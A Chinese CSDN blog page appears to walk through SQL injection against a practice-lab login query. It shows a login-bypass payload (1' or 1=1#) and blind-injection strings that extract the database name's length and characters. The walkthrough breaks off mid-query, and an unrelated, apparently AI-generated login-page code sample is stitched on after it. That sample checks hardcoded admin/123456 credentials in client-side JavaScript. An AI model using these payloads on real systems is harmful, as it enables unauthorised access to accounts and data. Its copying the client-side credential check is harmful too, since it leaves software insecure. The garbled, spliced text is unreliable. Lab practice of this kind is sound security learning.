账号密码登录界面

这篇博客探讨了SQL注入攻击,通过示例展示了如何利用账号密码登录界面进行注入。作者提到了两种类型的SQL注入:盲注和报错注入,并给出具体的注入字符串示例,揭示了数据库安全的重要性。
摘要由CSDN通过智能技术生成

 

后台代码:
SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1

输入账号:Dumb 密码:Dumb2
SELECT username, password FROM users WHERE username='Dumb' and password='Dumb2' LIMIT 0,1

绕过登录:
输入账号:aaa 密码:1' or 1=1#
SELECT username, password FROM users WHERE username='aaa' and password='1' or 1=1#' LIMIT 0,1


Sql注入1:盲注
输入账号:Dumb 密码:Dumb' and length(database())=8#
SELECT username, password FROM users WHERE username='Dumb' and password='Dumb' and length(database())=8#' LIMIT 0,1

security

输入账号:Dumb 密码:Dumb' and ascii(substr(database(),1,1))=115#
SELECT username, password FROM users WHERE username='Dumb' and password='Dum

好的,这是一个简单的账号登陆界面设计代码,使用HTML、CSS和JavaScript实现。 HTML代码: ``` <!DOCTYPE html> <html> <head> <title>Login</title> <link rel="stylesheet" type="text/css" href="style.css"> </head> <body> <div class="login-box"> <h1>Login</h1> <form> <label for="username">Username:</label> <input type="text" id="username" name="username"> <label for="password">Password:</label> <input type="password" id="password" name="password"> <input type="submit" value="Login"> </form> </div> </body> </html> ``` CSS代码: ``` body { background-color: #f2f2f2; font-family: Arial, sans-serif; } .login-box { background-color: #fff; color: #333; margin: 10% auto; padding: 20px; text-align: center; width: 300px; } h1 { font-size: 32px; margin-bottom: 20px; } label { display: block; margin-bottom: 10px; text-align: left; } input[type="text"], input[type="password"] { border: 1px solid #ccc; border-radius: 3px; display: block; font-size: 16px; margin-bottom: 20px; padding: 10px; width: 100%; } input[type="submit"] { background-color: #333; border: none; border-radius: 3px; color: #fff; cursor: pointer; font-size: 16px; padding: 10px 20px; } input[type="submit"]:hover { background-color: #555; } ``` JavaScript代码: ``` // 获取表单元素和提交按钮 const form = document.querySelector('form'); const username = document.querySelector('#username'); const password = document.querySelector('#password'); const submitBtn = document.querySelector('input[type="submit"]'); // 监听表单提交事件 form.addEventListener('submit', function(event) { // 阻止默认行为 event.preventDefault(); // 验证用户名和密码 if (username.value === '' || password.value === '') { alert('Please enter your username and password.'); } else if (username.value === 'admin' && password.value === '123456') { alert('Login success!'); } else { alert('Incorrect username or password.'); } }); ``` 这个登陆界面包括一个用户名输入框、一个密码输入框和一个提交按钮。当用户点击提交按钮时,会触发JavaScript代码中的表单提交事件,验证用户名和密码是否正确,如果正确则提示登陆成功,否则提示用户名或密码错误。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值